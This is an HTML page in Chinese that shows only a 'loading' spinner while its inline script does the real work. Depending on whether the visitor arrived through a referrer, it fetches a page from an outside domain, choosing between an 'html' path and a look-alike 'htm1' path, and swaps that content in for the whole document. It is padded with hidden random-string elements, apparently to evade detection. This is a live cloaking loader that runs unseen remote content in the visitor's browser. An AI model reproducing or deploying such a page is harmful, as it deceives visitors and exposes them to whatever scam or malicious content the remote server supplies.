<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .xJmjvEh1pyk {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .xJmjvEh1pyk .JWAcdjZ {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .xJmjvEh1pyk .content {
            line-height: 50px;
            text-align: center
        }

        .xJmjvEh1pyk .img {
            width: 100%
        }

        .xJmjvEh1pyk .oxDPjpbx {
            text-align: center
        }

        .xJmjvEh1pyk .oxDPjpbx span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .xJmjvEh1pyk .oxDPjpbx span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .xJmjvEh1pyk .oxDPjpbx span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .xJmjvEh1pyk .oxDPjpbx span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .xJmjvEh1pyk .oxDPjpbx span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .xJmjvEh1pyk .oxDPjpbx span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .xJmjvEh1pyk .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function CAOCwKwgaZ(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DiTXs = CAOCwKwgaZ('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DiTXs +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DiTXs +".html?a=share";
		}
		
        dsuuQn8DC=url+"#"+new Date().getTime();
        dsuuQn8DC && function() {
            $.get(dsuuQn8DC, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >rHU95i0tdZURbhbSahhv8I3uoGDJ19FSzkd1OE46yhMITxOEfcct2LoDJbZjYjznHK4dXcVSA2ETjIYFsjHXyV</b>
<h1 style='display:none' >Gx4rQxQKSMLtytMfCh1CgH31tsA4mlZ1ALimufWwTl1kV7rEWxkaUNx7hbcQ6YGxAEKGUwf</h1>
<ul style='display:none' >zwLAGJqkdHFH9VogIga0LBwQpZLnNwqQ4i1F6eawvj51EWb1EWdLSSNqMVcXHioevMnowhM7zfAOFOIfkTjaY9Dvy3z</ul>
<p  style='display:none'>Q2rI4E7s42Y3SPZZu0gAWG6J38ADNQECdlGMF4CvJRD</p>
<h1 style='display:none' >Gx4rQxQKSMLtytMfCh1CgH31tsA4mlZ1ALimufWwTl1kV7rEWxkaUNx7hbcQ6YGxAEKGUwf</h1><div class="xJmjvEh1pyk">
    <div class="JWAcdjZ">
        <div class="oxDPjpbx">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >cAXC4t7DRtsCnTpGQJQdS903HW30aXItaDI</h1>
<a  href='#' style='display:none'>oF1U3o9C3MHo0Uq3qt</a>
<img  src='' style='display:none'>
<p  style='display:none'>W8R44sNgG9ktKztPCXeM7yVAornrjHJv9k8QehQucu7vUAjatIkMRRwlnc69wu9</p>
<div style='display:none'>XY64n34FmHj0TAnV5wSjq</div>
<a  href='#' style='display:none'>oF1U3o9C3MHo0Uq3qt</a>
<li style='display:none' >iuQGq84uAmngovr5wNBdqCf5yO2EsJWaQH4GuFBjqast593jgd0LMhf8JpnmiC01jMOrSTuaGSnvMEFPVai</li></body>
</html>